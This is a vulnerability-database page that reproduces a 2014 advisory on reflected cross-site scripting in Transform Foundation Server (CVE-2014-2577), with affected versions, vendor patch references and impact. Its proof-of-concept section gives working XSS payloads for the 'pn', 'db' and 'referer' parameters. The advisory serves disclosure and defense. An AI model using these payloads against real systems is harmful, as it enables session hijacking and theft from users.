Vulners
Lucene search
Transform Foundation Server 4.3.1 / 5.2 Cross Site Scripting
🗓️ 03 Jun 2014 00:00:00Reported by Juan FranciscoType 
packetstorm🔗 packetstormsecurity.com👁 79 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2014-2577 | 5 Jun 201417:00 | – | cve |
 | CVE-2014-2577 | 5 Jun 201417:00 | – | cvelist |
 | EUVD-2014-2609 | 7 Oct 202500:30 | – | euvd |
 | CVE-2014-2577 | 5 Jun 201417:55 | – | nvd |
 | Transform Foundation Server Multiple XSS Vulnerabilities (Jun 2014) - Active Check | 12 Jun 201400:00 | – | openvas |
 | Cross site scripting | 5 Jun 201417:55 | – | prion |
 | [CVE-2014-2577] XSS on Transform Foundation Server 4.3.1 and 5.2 from Bottomline Technologies | 14 Jun 201400:00 | – | securityvulns |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 14 Jun 201400:00 | – | securityvulns |
`I. VULNERABILITY
-------------------------
Reflected XSS Attacks vulnerabilities in Transform Foundation server 4.3.1
and 5.2 from Bottomline Technologies
II. BACKGROUND
-------------------------
Bottomline offers powerful, next-generation electronic document solutions
for formatting,
personalizing and delivering ERP and business application output.
III. DESCRIPTION
-------------------------
Has been detected several Reflected XSS vulnerability in Transform
Foundation server 4.3.1 and 5.2
1. XSS on GET parameters:
http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn="XSS CODE"
http://XXXXXXXXXXXXX/"XSS CODE"server-status.cgi
2. XSS on POST parameters:
URL: XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp
PARAMETERS:
db="XSS CODE"
referer="XSS CODE"
IV. PROOF OF CONCEPT
-------------------------
GET:
The application does not validate the parameter "pn" correctly.
http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn=</i></p><BODY
ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>
http://XXXXXXXXXXXXX/<BODY
ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>server-status.cgi
POST:
The application does not validate the parameter "db" and "rerferer"
correctly.
XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp
db=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>
and
referer=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')
V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser
allowing Cookie Theft/Session Hijacking, thus enabling full access the
box.
VI. SYSTEMS AFFECTED
-------------------------
Transform Foundation Server 4.3.1
Transform Foundation Server 5.2
VII. SOLUTION
-------------------------
Patches released by the vendor available on customer portal and information
available here:
Transform Foundation Server 4.3.1 Patch 8:
http://www.pdf-archive.com/2014/06/03/tf52patch7releasenotes/preview/page/14/
SF2351630
SF2364411
SF2391461
Transform Foundation Server 5.2 Patch 7:
http://www.pdf-archive.com/2014/06/03/tf52patch7releasenotes/preview/page/14/
SF2351630
SF2364411
SF2391461
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2577
Detected and reported by J. Francisco Bolivar (es.linkedin.com/in/jfbolivar/
)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jun 2014 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.00421